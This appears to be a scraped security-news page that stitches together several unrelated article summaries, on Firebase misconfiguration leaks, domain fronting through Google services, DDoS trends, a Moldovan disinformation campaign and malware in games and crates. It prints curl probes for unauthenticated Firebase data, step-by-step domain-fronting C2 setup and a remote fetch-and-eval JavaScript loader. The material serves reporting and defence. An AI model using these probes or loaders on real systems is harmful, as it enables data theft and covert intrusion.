Security researchers at Hacker House have released SetupHijack, a proof-of-concept tool that exploits race conditions and insecure file handling in Windows installers and updaters. The utility demonstrates how attackers can hijack privileged setup processes to run malicious payloads with SYSTEM or Administrator rights. Exploiting Race Conditions in Windows Installers SetupHijack targets installers and updaters that […]
Numerous mobile applications have been found to expose critical user information through misconfigured Firebase services, allowing unauthenticated attackers to access databases, storage buckets, Firestore collections, and Remote Config secrets.
This widespread issue first came to light when security researcher Mike Oude Reimer published findings on 16 September 2025, demonstrating that approximately 150 different Firebase endpoints in top-ranked mobile apps were accessible without any authentication.
These exposures ranged from user credentials and private messages to high-privilege API tokens, underscoring a systemic weakness in how developers configure Firebase security rules.
In the weeks following the initial disclosure, ice0 analysts identified a surge in automated scanning tools exploiting this vulnerability, with attackers harvesting millions of records in bulk.
These tools rely on extracting Firebase project IDs from app APK files or known naming conventions, then probing various service endpoints for open permissions.
Although Firebase warns developers that test-mode configurations expire after 30 days, many teams extend these insecure rules or inadvertently leave production environments in test mode.
The result is an expansive attack surface that miscreants can exploit with minimal effort, jeopardizing both enterprise and consumer data.
The impact extends beyond trivial resources such as public images or non-sensitive flags.
At scale, exposed storage buckets have contained millions of user ID photos, cleartext passwords, and even AWS root access tokens.
In one instance, a storage bucket belonging to an app with over 100 million downloads was discovered hosting user ID photos, allowing attackers to compile vast identity databases.
Similarly, misconfigured Realtime Databases revealed private chat logs and geolocation information, while Remote Config endpoints exposed private API keys for third-party services.
ice0 analysts noted that many of these leaks went unreported or were dismissed as non-issues until full datasets were downloaded and inspected.
The following section explores the infection mechanism leveraged by scanning tools to enumerate and exploit Firebase services, focusing on APK extraction, endpoint discovery, and unauthenticated data retrieval.
Infection Mechanism: APK Analysis and Endpoint Enumeration
Scanning tools like OpenFirebase begin by parsing Android Package Kit (APK) files to extract Firebase project IDs, API keys, and Google App IDs from the compiled res/values/strings[.]xml and bundled google-services[.]json.
These identifiers serve as the primary inputs for constructing service URLs. For example, to retrieve a Realtime Database, the scanner issues a simple GET request appending [.]json to the endpoint:
curl - s https[:]//PROJECT_ID-default-rtdb[.]firebaseio[.]com/[.]json
If the response returns HTTP 200 OK and JSON content, the database is flagged as public. In cases where the database resides in a different region, the initial request returns a JSON error containing the correct regional endpoint, which the tool uses to reissue the request.
This two-step lookup ensures comprehensive coverage without brute-forcing every possible domain variation.
For Remote Config, scanners extract both the google_api_key and google_app_id from strings[.]xml before constructing a POST request to the Remote Config API:
curl - s - X POST \
- H "Content-Type: application/json" \
- d '{"appId":"GOOGLE_APP_ID","appInstanceId":"any"}' \
"https[:]//firebaseremoteconfig[.]googleapis[.]com/v1/projects/PROJECT_ID/namespaces/firestore[:]fetch"
A successful 200 OK response containing configuration data or secrets confirms unauthenticated access to Remote Config entries.
Some configurations include the NOTEMPLATE error when no config exists, allowing scanners to differentiate between protected and empty endpoints.
By automating APK decompilation with tools like JADX and iterating through Firestore collection names—either extracted from code references or guessed via wordlists—attackers can enumerate public Firestore instances.
Github token (Source – ice0)
A query to a non-existent collection returns an empty JSON array rather than an authentication error, signaling vulnerability without prior knowledge of collection names.
This infection mechanism, combining APK metadata extraction with targeted API calls, highlights how minimal information disclosure can lead to full data leakage. Organizations relying on
Firebase must enforce strict security rules, audit test-mode expirations, and remove hardcoded keys to prevent these automated attacks.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Steam has officially confirmed that malware was discovered in the popular indie game BlockBlasters. The announcement follows widespread player reports and security scans that flagged unusual activity in the game’s files. This incident raises concerns about game security and digital storefront safety. Background of the Incident BlockBlasters launched earlier this month and quickly gained attention […]
Cybersecurity researchers have discovered two malicious Rust crates impersonating a legitimate library called fast_log to steal Solana and Ethereum wallet keys from source code.
The crates, named faster_log and async_println, were published by the threat actor under the alias rustguruman and dumbnbased on May 25, 2025, amassing 8,424 downloads in total, according to software supply chain
Attackers have stepped up their tactics by deploying stealthy backdoors disguised as legitimate WordPress components, ensuring persistent administrative access even after other malware is discovered and removed. Their deceptive appearances belied their dangerous functions: one impersonated a plugin, the other camouflaged itself as a core file. Together, they formed a resilient system that gave hackers […]
Organizations commonly allow traffic to core services like Google Meet, YouTube, Chrome update servers, and Google Cloud Platform (GCP) to ensure uninterrupted operations.
A newly demonstrated domain fronting technique weaponizes this trust to establish covert command-and-control (C2) channels, enabling attackers to tunnel malicious traffic through Google’s own infrastructure without raising suspicion.
Domain Fronting Technique
Praetorian reports that domain fronting exploits the discrepancy between the TLS Server Name Indication (SNI) and the HTTP Host header. In a standard HTTPS handshake, the client presents the SNI in cleartext, for example:
Once the TLS tunnel is established, the HTTP Host header inside the encrypted request can specify an entirely different domain:
By routing through Google’s front-end servers, adversaries can connect to meet.google.com, youtube.com, update.googleapis.com, or even GCP endpoints, while backend routing diverts traffic to attacker-controlled infrastructure hosted on Google Cloud Run or App Engine.
Google[.]com Domain Fronting
To network monitors, the packets appear indistinguishable from legitimate Google usage, blending malicious C2 with normal enterprise traffic.
Researchers created a simple Cloud Run function returning “Hello World!” and inserted its URL in the Host header when connecting to google.com.
Domain Fronting Across Google Services
Unexpectedly, the Cloud Run function was invoked, confirming that the request had been routed to attacker infrastructure rather than Google’s public web servers. This edge-case behavior extends across multiple Google domains, including:
update.googleapis.com
payments.google.com
api.snapchat.com (leveraging Google App Engine)
Because these domains are often excluded from TLS inspection due to certificate pinning or classification as financial or healthcare services, security appliances rarely inspect or block them, granting attackers near-total invisibility.
Historically, major providers blocked domain fronting by enforcing SNI and Host header consistency.
However, Google’s internal load-balancer routing logic still allows mismatches in specific services, creating an unintentional fronting vector. The attack sequence is as follows:
Initiate a TLS handshake with SNI set to a high-reputation Google domain (e.g., youtube.com). Within the encrypted request, set the Host header to the C2 domain hosted on Cloud Run or App Engine.
Google’s front-end accepts the SNI, terminates TLS, and routes the decrypted HTTP request to backend infrastructure based on the Host header. The attacker’s backend handles the request, enabling bidirectional tunneling through standard HTTPS.
A redirector tool, praetorian-inc/google-redirector, automates setup for red team engagements. Deploying this redirector alongside existing implants allows seamless HTTP-based C2 over Google’s highly trusted channels.
This technique revives the power of domain fronting within Google’s ecosystem, presenting defenders with a formidable challenge: blocking malicious C2 without disrupting essential business services.
Vigilance demands enhanced detection strategies, such as certificate consistency checks, analysis of abnormal traffic patterns, and strict host validation at the enterprise perimeter.
As attackers turn the Internet’s backbone into their covert pipeline, defenders must adapt to identify hidden threats that are hiding in plain sight.
Luxembourg, Luxembourg, September 25th, 2025, CyberNewsWire
Gcore, the global edge AI, cloud, network, and security solutions provider, today announced the findings of its Q1-Q2 2025 Radar report into DDoS attack trends. DDoS attacks have reached unprecedented scale and disruption in 2025, and businesses need to act fast to protect themselves from this evolving threat. The report reveals a significant escalation in the total number of DDoS attacks and their magnitude, measured in terabits per second (Tbps).
It also highlights a clear shift: attackers are growing more strategic, blending brute-force volume with precise application-layer manipulation.
Key Insights From Q1-Q2 2025
· Attack volumes increased by 41% compared to Q1-Q2 2024, evidencing dangerous long term growth trends predicted in prior Radar reports.
· The largest attack peaked at 2.2 Tbps in Q1-Q2, surpassing the 2 Tbps peak recorded in late 2024.
· DDoS attacks are becoming longer in duration but more harmful.
· Attackers are shifting focus to financial services and tech, with tech overtaking gaming as the most targeted sector.
· DDoS attacks at the application layer have increased by 10% from Q3-Q4 2024 to Q1-Q2 2025.
· The total number of DDoS attacks climbed from 969,000 in H2 2024 to 1.17 million in H1 2025.
Andrey Slastenov, Head of Security at Gcore, commented: “The latest Gcore Radar should be a wake-up call to businesses across all industries. Not only are the number and intensity of attacks increasing, but attackers are expanding the scope of their attacks to reach an increasingly wide range of sectors. Businesses must invest in robust DDoS detection, mitigation, and protection to prevent the financial and reputational impact of an attack.’’
Recent Data Shows Shift Toward Longer Sustained Assaults
Attacks shorter than 10 minutes have decreased by about 33%, while those lasting between 10 and 30 minutes have nearly quadrupled. While previous reports highlighted the dominance of very short, intense DDoS attacks, this change indicates that attackers are adapting to the improved automatic detection and mitigation systems employed by companies to handle brief attacks. By extending attack durations, threat actors can circumvent these temporary defense thresholds, cause more extensive damage, and test infrastructure resilience over time.
Multi-vector attacks have also increasingly become a preferred tactic of attackers. By masking malicious activity within seemingly legitimate traffic, attackers complicate detection and extend their window to cause damage. This shift toward more sophisticated attacks underscores the need for an equally layered defense approach that anticipates attacker strategies and protects critical digital assets holistically.
Data Indicates Rise in Attacks on Vulnerable Sectors
Gaming is no longer the dominant target it once was. Its share of total DDoS attacks has dropped significantly (30% in the last year). This notable decline suggests attackers are shifting focus to other sectors such as tech (attacks increased by 15%) and financial services (attacks increased by 15%). These sectors are favored targets because they may be less protected against threat actors and have higher disruption potential.
The Domino Effect of Cyberattacks
Hosting providers, in particular, have become prime targets due to their role supporting SaaS, e-commerce, gaming, and financial clients. An attack on one hosting provider can have dangerous ripple effects: massive service outages and reputation damage to dozens of dependent companies.
Geographical Distribution of DDoS Attacks
With a presence that spans six continents, Gcore can accurately track the geographical sources of DDoS attacks. Gcore derives these insights from the attackers’ IP addresses and the geographic locations of the data centers where malicious traffic is targeted.
Although the United States and the Netherlands remain top sources for attacks (as found in previous Radar reports), Hong Kong is a new source of threats. Hong Kong now accounts for 17% of all network-layer and 10% of application-layer attacks. These findings indicate that attackers are expanding into emerging areas, highlighting the need for proactive and adaptive defenses across diverse regions.
Emerging Origins of Attacks
The rapid increase in application layer attacks (28% to 38% from Q3-Q4 2024 to Q1-Q2 2025) also reveals an overall trend toward multi-layered attacks targeting web application and API vulnerabilities, which particularly impact sectors with a high degree of customer interaction (ranging from e-commerce and online banking to logistics and public services).
Gcore is a global edge AI, cloud, network, and security solutions provider. Headquartered in Luxembourg, with a team of 600 operating from ten offices worldwide, Gcore provides solutions to global leaders in numerous industries. Gcore manages its global IT infrastructure across six continents, with one of the best network performances in Europe, Africa, and LATAM due to the average response time of 30 ms worldwide. Gcore’s network consists of 210 points of presence worldwide in reliable Tier IV and Tier III data centers, with a total network capacity exceeding 200 Tbps.
Gcore, the global edge AI, cloud, network, and security solutions provider, today announced the findings of its Q1-Q2 2025 Radar report into DDoS attack trends. DDoS attacks have reached unprecedented scale and disruption in 2025, and businesses need to act fast to protect themselves from this evolving threat. The report reveals a significant escalation in […]
On the eve of Moldova’s parliamentary elections scheduled for September 28, 2025, cybersecurity researchers have uncovered a sophisticated Russian-backed disinformation campaign designed to undermine public confidence in Moldova’s pro-European leadership.
The campaign began surfacing in April 2025, when analysts first observed a cluster of newly registered domains publishing biased news articles in both Romanian and Russian.
These websites employed identical templates and shared infrastructure with older Russian propaganda outlets, signaling an orchestrated effort to sow discord at a critical juncture in Moldova’s democratic process.
Silent Push analysts identified the campaign through a combination of open-source intelligence and network traffic analysis.
Initial indicators included dozens of URLs hosting political commentary with inflammatory headlines aimed at discrediting the ruling coalition and amplifying calls to pivot back toward Moscow.
Subsequent investigations revealed that these domains resolved to two dedicated IP addresses, both of which had previously hosted content for a 2022 disinformation operation known as Absatz.
By correlating registration metadata and hosting records, researchers established a clear lineage between the new Moldovan targeting effort and earlier campaigns.
Through deep technical analysis, Silent Push analysts noted that the new sites reused several bespoke functions originally developed for the 2022 effort.
These functions handled content generation, automatic comment moderation, and stealthy redirection of social-media referrals.
Reusing this code not only accelerated deployment but also provided a unique fingerprint enabling researchers to connect the disparate sites.
The technical footprint was especially evident in the PHP module responsible for article templating and URL parameter parsing, which contained the following identifiable snippet:-
By comparing hash fragments in each URL, analysts could trace the evolution of the codebase across both the 2022 Absatz infrastructure and the 2025 Moldovan campaign.
Detection Evasion and Infrastructure Persistence
The campaign’s operators demonstrated advanced persistence tactics, carefully architecting their infrastructure to evade conventional detection.
Each disinformation website employed a rotating pool of content delivery networks (CDNs) and proxy services to mask origin IPs, falling back to hard-coded backup hosts when a primary node was taken offline.
DNS records were configured with extremely short TTL values—often under five minutes—forcing security teams to constantly refresh caches and complicating takedown efforts.
In one instance, when researchers successfully blocked access to a malicious domain at the ISP level, the site automatically redirected visitors to an alternate domain using a stealth JavaScript loader:
[script]
fetch('https://cdn.cloudproxy[.]net/get?siteId=42')
. then (res =() res[.]text())
. then (code =() eval (code));
[/script]
This loader fetched an obfuscated payload from a third-party CDN, which in turn rehydrated the disinformation site content in the user’s browser without touching the original domain.
By leveraging this dual-stage loading mechanism, the campaign could survive domain blacklisting and continue publishing articles without significant downtime.
To maintain operational security, all command-and-control interactions for new content updates were conducted over TLS-encrypted channels using non-standard ports.
The same ports had been observed in the 2022 Absatz campaign, further cementing the link between the two efforts.
Analysts also noted that social-media amplification relied on low-quality bot accounts programmed to mimic genuine user behavior by varying posting times and interleaving political content with neutral topics like sports or local weather.
As Moldova approaches the polls, this campaign underscores the importance of technical collaboration and real-time monitoring to defend democratic institutions from covert influence operations.
Silent Push continues to track and mitigate the evolving infrastructure behind the Storm-1679 network, with detailed telemetry available to enterprise customers for proactive defense measures.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
In a recently observed campaign emerging from Israel, threat actors have revived the use of Windows shortcut (.LNK) files to deliver a potent Remote Access Trojan (RAT). These seemingly innocuous shortcut files exploit Living-off-the-Land Binaries (LOLBins) such as odbcconf.exe to silently register and execute malicious DLLs, evading security tools and complicating detection efforts. The attack […]
.webp)
.webp)
